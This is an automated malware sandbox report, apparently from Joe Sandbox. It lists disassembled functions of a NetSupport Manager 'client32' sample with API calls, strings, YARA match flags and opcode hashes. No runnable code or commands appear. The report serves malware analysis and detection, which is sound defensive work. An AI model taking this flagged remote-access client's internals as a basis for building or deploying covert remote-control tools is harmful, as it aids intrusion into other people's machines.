                                                                                • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                Strings
                                                                                • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                • API String ID: 0-3856134272
                                                                                • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: WTSSendMessageA
                                                                                • API String ID: 199729137-1676301106
                                                                                • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                APIs
                                                                                • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                • API String ID: 175691280-2052047905
                                                                                • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                • m_hWnd, xrefs: 11015049
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                APIs
                                                                                • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                • API String ID: 175691280-2052047905
                                                                                • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D84D
                                                                                Strings
                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D81E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                • API String ID: 199729137-262600717
                                                                                • Opcode ID: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                • Instruction ID: a7eb98fa6670c8ef5a6ef58352877086b50851194238c89ec414a48c6dd1b06f
                                                                                • Opcode Fuzzy Hash: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                • Instruction Fuzzy Hash: 2EF05E72A41228AFD724CF94E944A97B7E8EB48710F00491AF95A97640C670E810CBA0
                                                                                APIs
                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                • API String ID: 1134434899-3115850912
                                                                                • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                • m_hWnd, xrefs: 110151F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: QueueUserWorkItem
                                                                                • API String ID: 199729137-2469634949
                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread__wcstoi64
                                                                                • String ID: *TapiFixPeriod$Bridge
                                                                                • API String ID: 1152747075-2058455932
                                                                                • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                APIs
                                                                                • GetWindowTextLengthA.USER32(76961A30), ref: 1115B8C3
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • GetWindowTextA.USER32(76961A30,00000000,00000001), ref: 1115B8DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_malloc_memset
                                                                                • String ID: ...
                                                                                • API String ID: 2795061067-1685331755
                                                                                • Opcode ID: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                • Instruction ID: 4b1d5b0fb85ecc65756fa04cbc49f4114121db69e5f1a8b46b9f358c176aa325
                                                                                • Opcode Fuzzy Hash: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                • Instruction Fuzzy Hash: A5E0E565A041965FC2404639AA4898BFF59FB86208B044430F0B6D7105DA24E40987E0
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: FlashWindowEx
                                                                                • API String ID: 199729137-2859592226
                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                APIs
                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110010A6
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2046328329-2830328467
                                                                                • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                APIs
                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11001066
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 819365019-2830328467
                                                                                • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                APIs
                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110010F6
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 906220102-2830328467
                                                                                • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                APIs
                                                                                • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                • m_hWnd, xrefs: 110151B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                APIs
